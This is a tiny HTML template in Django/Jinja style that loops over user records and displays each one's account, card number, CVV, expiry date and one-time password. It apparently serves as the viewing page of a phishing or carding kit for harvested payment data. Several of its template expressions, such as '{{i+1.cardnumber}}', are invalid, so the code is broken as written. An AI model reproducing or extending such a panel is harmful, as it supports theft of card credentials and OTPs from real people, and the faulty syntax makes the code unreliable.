<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
{% for i in user_co %}
{
<br>
        number = {{i.number}}
        <br>
        account = {{i.account}}
        <br>
        date = {{i.date}}
        <br>
        cardnumber = {{i+1.cardnumber}}
        <br>
        cvv = {{i+1.cvv}}
        <br>
        expirydate = {{i+1.expirydate}}
        <br>
        otp  = {{i+2.otp}}
        <br>
}
    
{%  endfor %}
    
</body>
</html>








